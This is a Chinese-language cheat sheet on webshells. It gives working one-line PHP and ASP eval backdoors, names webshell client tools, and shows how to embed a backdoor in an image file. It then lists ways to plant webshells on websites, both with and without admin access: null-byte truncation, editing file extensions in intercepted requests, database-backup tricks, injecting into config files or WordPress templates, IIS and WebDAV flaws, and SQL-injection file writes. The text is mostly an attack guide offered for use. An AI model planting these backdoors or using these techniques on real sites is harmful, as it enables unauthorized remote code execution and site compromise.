web安全之webshell
一句话验证
<?php phpinfo();?>
一句话木马
<?php @eval($_POST[cmd]);?>
webshell管理工具
webshell木马类型:一句话、小马、大马、图片马、打包马、脱裤马
webshell脚本类型:asp、aspx、jsp、php
asp:<%eval request("password")%>
aspx:
php:<?php eval($_POST[password])?>
jsp:特定jsp客户端
webshell客户端:菜刀(文件管理、虚拟终端、数据库管理、网站爬行等功能)、蚁剑、冰蝎等等。
菜刀
蚁剑
冰蝎
哥斯拉
如何制作图片马:
#图片马工具c32asm或edjpgcom
拖动图片——添加一句话
#cmd制作
copy /b 1.jpg+1.asp 2.jpg
#图片属性添加
右键详细信息——版权——插入一句话
如何get webshell:
#拿webshell(已进入后台)
直接上传:上传不带密码的木马
数据库备份:利用cms的备份数据库功能,将上传的jpg木马转化成asp木马。(使用bp进行00截断,以图消解转化后的asp木马后缀asa)
突破本地js验证:审查元素里添加允许上传的文件类型如php、改成jpg后上传,bp抓包修改文件后缀
上传其它脚本类型(只限定一机多站情况):通过数据库备份突破限制、修改后缀为xx.asp.
00截断:上传.jpg文件,抓包修改.jpg文件为.php %00解码(或Hex里20改成00),以注释后边。
网站配置插马:页面插入一句话木马、配置文件(头部或尾部)插入一句话木马 菜刀连接该页面或该配置文件
数据库命令执行:通过执行SQL语句写入一句话木马 前提--网站后台支持执行sql且数据库用户权限够大。
添加静态页面:在cms中添加静态页面模板,结合IIS6.0解析漏洞。
更新404页面:WordPress中编辑404页面
上传插件:插件中捆绑木马
修改网站配置:kevion cms修改上传类型为aaspsp
#拿webshell(未进入后台)
dedecms漏洞利用小工具
IIS写权限漏洞:开启webDAV后可使用PUT和MOVE方法,上传txt然后转换成asp。
命令执行漏洞:执行手工构造的命令(上传一句话木马)
文件上传漏洞:上传图片-bp抓包-改成木马的压缩包
SQL注入漏洞:前提-权限大、文件夹有写入权限、已知网站绝对路径。